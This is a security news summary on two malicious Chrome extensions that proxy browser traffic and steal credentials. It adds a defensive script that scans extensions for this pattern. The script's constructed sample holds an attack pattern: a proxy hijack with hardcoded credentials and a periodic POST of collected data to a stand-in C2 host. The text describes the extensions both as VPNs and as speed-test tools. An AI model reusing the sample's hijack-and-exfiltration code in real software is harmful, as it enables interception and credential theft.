Cybersecurity researchers have identified two malicious Google Chrome extensions that pose as VPN services but are built to intercept browser traffic and steal user credentials. By routing the browser's traffic through attacker-controlled proxies, the extensions sit in the middle of every connection the user makes, and they exfiltrate what they collect to command-and-control (C2) servers, putting both individual users and the organizations whose accounts they log into at risk. #ChromeExtensions #ManInTheMiddleAttack
Keypoints
- The malicious extensions are presented to users as network speed test tools, but their real function is covert interception of the user's traffic.
- They point the browser at attacker-controlled proxy servers and answer the resulting proxy authentication challenges with hardcoded credentials, so the user is never prompted and all traffic silently transits the attacker's infrastructure.
- The extensions watch for traffic to more than 170 high-value domains, including cloud providers, social media platforms, and adult sites.
- Captured credentials and session data are exfiltrated continuously, riding on periodic heartbeat messages to a C2 server.
- Affected users should uninstall the extensions and, since credentials and sessions captured while they were installed must be treated as compromised, rotate passwords and sign out of active sessions. Organizations should enforce extension allowlisting through browser policy and monitor endpoints for unexpected proxy configuration changes and periodic beaconing to unknown hosts.
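The pattern in the points above (a proxy permission, an auth handler that answers proxy challenges with literal credentials, a watchlist of target domains, and a periodic beacon to an external host) can be triaged statically from an unpacked extension before it is allowlisted. The following is an added example, not code from the article or from the extensions it describes; it assumes the hijack is implemented with the standard chrome.proxy and chrome.webRequest.onAuthRequired APIs (which matches the article's description but is not named there), and the indicator regexes, the 20-domain threshold, and both sample extensions are constructed for this example.

```javascript
// Added example: static triage of an unpacked Chrome extension for the
// traffic-hijacking pattern. Not code from the article or the extensions it
// covers; indicators, thresholds and the two samples below are assumptions.

// Permissions that let an extension set the proxy and intercept auth challenges.
const RISKY_PERMISSIONS = ["proxy", "webRequest", "webRequestAuthProvider", "webRequestBlocking"];

// Code indicators, assuming the standard chrome.* APIs are used.
const INDICATORS = [
  { id: "proxy_settings",  re: /chrome\.proxy\.settings\.set\s*\(/ },
  { id: "auth_listener",   re: /onAuthRequired\.addListener\s*\(/ },
  // A literal username/password handed back to an auth challenge.
  { id: "hardcoded_creds", re: /authCredentials\s*:\s*\{\s*username\s*:\s*["'][^"']+["']\s*,\s*password\s*:\s*["'][^"']+["']/ },
  // setInterval followed within a short window by a fetch to an absolute URL: a beacon.
  { id: "periodic_beacon", re: /setInterval\s*\([\s\S]{0,400}?fetch\s*\(\s*["']https?:\/\// },
];

const HOSTNAME_RE = /["']((?:[a-z0-9-]+\.)+[a-z]{2,})["']/gi; // bare quoted hostnames (watchlist entries)
const URL_RE = /["'](https?:\/\/[^"'\s]+)["']/gi;               // absolute URLs (beacon/C2 candidates)

// ext = { manifest: <manifest.json text>, scripts: { filename: source text } }
function triageExtension(ext, opts = {}) {
  const domainThreshold = opts.domainThreshold ?? 20; // assumed cutoff for a "watchlist-sized" host list
  const manifest = JSON.parse(ext.manifest);
  const code = Object.values(ext.scripts).join("\n");
  const findings = [];

  const perms = new Set([...(manifest.permissions || []), ...(manifest.optional_permissions || [])]);
  const risky = RISKY_PERMISSIONS.filter((p) => perms.has(p));
  if (risky.includes("proxy")) findings.push("permission:proxy");
  if (risky.some((p) => p.startsWith("webRequest"))) findings.push("permission:webRequest");

  for (const ind of INDICATORS) if (ind.re.test(code)) findings.push(`code:${ind.id}`);

  const hosts = new Set([...code.matchAll(HOSTNAME_RE)].map((m) => m[1].toLowerCase()));
  const externalUrls = [...new Set([...code.matchAll(URL_RE)].map((m) => m[1]))];
  if (hosts.size >= domainThreshold) findings.push(`watchlist:${hosts.size}_domains`);

  // "hijack" requires the whole chain: a way to set the proxy, an auth handler, and literal credentials.
  const has = (f) => findings.includes(f);
  const hijack = has("code:auth_listener") && has("code:hardcoded_creds") &&
                 (has("permission:proxy") || has("code:proxy_settings"));
  const verdict = hijack ? "hijack" : findings.length ? "review" : "clean";
  return { verdict, findings, domainCount: hosts.size, externalUrls };
}

// Constructed sample 1: mimics the reported pattern (hosts use reserved example/.invalid names).
const HIJACK_SAMPLE = {
  manifest: JSON.stringify({
    manifest_version: 3, name: "Sample VPN (constructed)", version: "1.0",
    permissions: ["proxy", "webRequest", "webRequestAuthProvider", "storage"],
    host_permissions: ["<all_urls>"], background: { service_worker: "bg.js" },
  }),
  scripts: { "bg.js": `
const WATCHLIST = ["login.example.com", "mail.example.net", "drive.example.org",
                   "social.example.com", "cloud.example.net", "bank.example.org"];
chrome.proxy.settings.set({ value: { mode: "fixed_servers",
  rules: { singleProxy: { scheme: "https", host: "proxy.attacker.invalid", port: 443 } } }, scope: "regular" });
chrome.webRequest.onAuthRequired.addListener((details, callback) => {
  if (details.isProxy) callback({ authCredentials: { username: "proxyuser", password: "proxypass" } });
}, { urls: ["<all_urls>"] }, ["asyncBlocking"]);
setInterval(() => {
  fetch("https://c2.attacker.invalid/heartbeat", { method: "POST", body: JSON.stringify(collected) });
}, 60000);
` },
};

// Constructed sample 2: a benign speed-test extension that only measures latency.
const BENIGN_SAMPLE = {
  manifest: JSON.stringify({
    manifest_version: 3, name: "Sample Speed Test (constructed)", version: "1.0",
    permissions: ["storage"], background: { service_worker: "bg.js" },
  }),
  scripts: { "bg.js": `
async function measure() {
  const t0 = performance.now();
  await fetch("https://speedtest.example.com/ping", { cache: "no-store" });
  return performance.now() - t0;
}
chrome.runtime.onMessage.addListener((msg, sender, reply) => { measure().then(reply); return true; });
` },
};

function runSamples() {
  return { hijack: triageExtension(HIJACK_SAMPLE, { domainThreshold: 5 }), benign: triageExtension(BENIGN_SAMPLE) };
}

console.log(JSON.stringify(runSamples(), null, 2));
```

The verdict is deliberately conservative: a bare proxy or webRequest permission only yields "review", because legitimate VPN and filtering extensions need them; "hijack" is reported only when the auth handler and literal credentials are both present alongside a way to set the proxy. The extracted hostnames and URLs are what you would feed into network monitoring as the watchlist and beacon destinations to alert on.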
Read More: https://thehackernews.com/2025/12/two-chrome-extensions-caught-secretly.html